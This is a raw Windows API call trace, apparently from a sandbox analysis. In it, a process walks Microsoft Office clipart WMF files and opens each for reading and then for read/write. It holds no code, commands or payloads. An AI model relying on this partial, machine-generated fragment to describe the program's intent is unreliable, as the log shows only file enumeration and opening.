[0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00419_.WMF", cAlternateFileName="")) returned 1 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] AreFileApisANSI () returned 1 [0103.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.909] AreFileApisANSI () returned 1 [0103.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.910] GetFileType (hFile=0x368) returned 0x1 [0103.910] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.911] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.911] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.911] CloseHandle (hObject=0x368) returned 1 [0103.911] AreFileApisANSI () returned 1 [0103.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.911] GetFileType (hFile=0x368) returned 0x1 [0103.911] CloseHandle (hObject=0x368) returned 1 [0103.911] AreFileApisANSI () returned 1 [0103.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.911] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c8)) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00437_.WMF", cAlternateFileName="")) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] AreFileApisANSI () returned 1 [0103.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.912] AreFileApisANSI () returned 1 [0103.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.912] GetFileType (hFile=0x368) returned 0x1 [0103.912] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.912] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.913] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.913] CloseHandle (hObject=0x368) returned 1 [0103.913] AreFileApisANSI () returned 1 [0103.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.913] GetFileType (hFile=0x368) returned 0x1 [0103.913] CloseHandle (hObject=0x368) returned 1 [0103.913] AreFileApisANSI () returned 1 [0103.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.913] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78c)) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb88, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00448_.WMF", cAlternateFileName="")) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] AreFileApisANSI () returned 1 [0103.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.914] AreFileApisANSI () returned 1 [0103.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.914] GetFileType (hFile=0x368) returned 0x1 [0103.914] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.914] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.915] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.915] CloseHandle (hObject=0x368) returned 1 [0103.915] AreFileApisANSI () returned 1 [0103.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.915] GetFileType (hFile=0x368) returned 0x1 [0103.915] CloseHandle (hObject=0x368) returned 1 [0103.915] AreFileApisANSI () returned 1 [0103.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.915] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00448_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb88)) returned 1 [0103.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.915] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2708, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00449_.WMF", cAlternateFileName="")) returned 1 [0103.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.915] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.916] AreFileApisANSI () returned 1 [0103.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.916] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.916] AreFileApisANSI () returned 1 [0103.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.916] GetFileType (hFile=0x368) returned 0x1 [0103.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.916] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.917] CloseHandle (hObject=0x368) returned 1 [0103.917] AreFileApisANSI () returned 1 [0103.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.917] GetFileType (hFile=0x368) returned 0x1 [0103.917] CloseHandle (hObject=0x368) returned 1 [0103.917] AreFileApisANSI () returned 1 [0103.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.917] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2708)) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DD00687_.WMF", cAlternateFileName="")) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] AreFileApisANSI () returned 1 [0103.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF", lpUsedDefaultChar=0x0) returned 69 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.918] AreFileApisANSI () returned 1 [0103.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.918] GetFileType (hFile=0x368) returned 0x1 [0103.918] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.918] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.918] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.918] CloseHandle (hObject=0x368) returned 1 [0103.918] AreFileApisANSI () returned 1 [0103.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.919] GetFileType (hFile=0x368) returned 0x1 [0103.919] CloseHandle (hObject=0x368) returned 1 [0103.919] AreFileApisANSI () returned 1 [0103.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.919] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00687_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5130)) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.919] 